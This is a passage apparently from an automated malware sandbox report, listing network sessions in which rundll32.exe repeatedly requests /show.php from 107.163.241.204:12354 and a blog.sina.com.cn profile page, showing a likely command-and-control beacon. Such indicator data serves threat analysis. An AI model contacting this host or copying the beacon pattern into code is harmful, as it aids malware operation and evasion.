                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      57192.168.2.950317107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:38.392302036 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      58192.168.2.950319107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:38.510656118 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      59192.168.2.950320202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:38.512219906 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      60192.168.2.950354107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:40.637304068 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      61192.168.2.950356107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:40.786845922 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      62192.168.2.950382107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:42.404793024 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      63192.168.2.950385107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:42.520065069 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      64192.168.2.950386202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:42.520148993 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:44.655164957 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:44 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      65192.168.2.950414107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:44.650203943 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      66192.168.2.950416107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:44.764868021 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      67192.168.2.950446107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:46.441603899 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      68192.168.2.950450107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:46.581362963 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      69192.168.2.950451202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:46.582151890 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:48.143218040 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:47 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      70192.168.2.950483107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:48.655706882 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      71192.168.2.950487107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:48.816800117 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      72192.168.2.950517107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:50.576754093 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      73192.168.2.950520202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:50.694227934 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:52.271370888 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:52 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      74192.168.2.950521107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:50.696141958 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      75192.168.2.950571107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:52.809834003 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      76192.168.2.950574107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:52.939590931 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      77192.168.2.950610107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:54.591496944 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      78192.168.2.950614107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:54.710439920 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      79192.168.2.950615202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:54.727915049 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:56.292313099 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      80192.168.2.950675107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:56.906470060 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      81192.168.2.950681107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:57.023998022 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      82192.168.2.950726107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:58.762630939 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      83192.168.2.950730107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:58.762767076 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      84192.168.2.950731202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:58.762850046 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:00.326045036 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:00 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      85192.168.2.950804107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:00.979048014 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      86192.168.2.950810107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:01.095097065 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      87192.168.2.950858107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:02.944627047 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      88192.168.2.950861107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:03.081012011 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      89192.168.2.950862202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:03.089596987 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:04.663110971 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:04 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      90192.168.2.950959107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:05.187299013 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      91192.168.2.950969107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:05.310873985 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      92192.168.2.951054107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:07.076435089 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      93192.168.2.951059107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:07.195472956 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      94192.168.2.951060202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:07.196517944 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:08.789449930 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:08 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      95192.168.2.951165107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:09.309463024 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      96192.168.2.951174107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:09.444801092 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      97192.168.2.951270107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:11.075556993 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      98192.168.2.951280202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:25:11.214385033 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:25:12.778274059 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:25:12 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
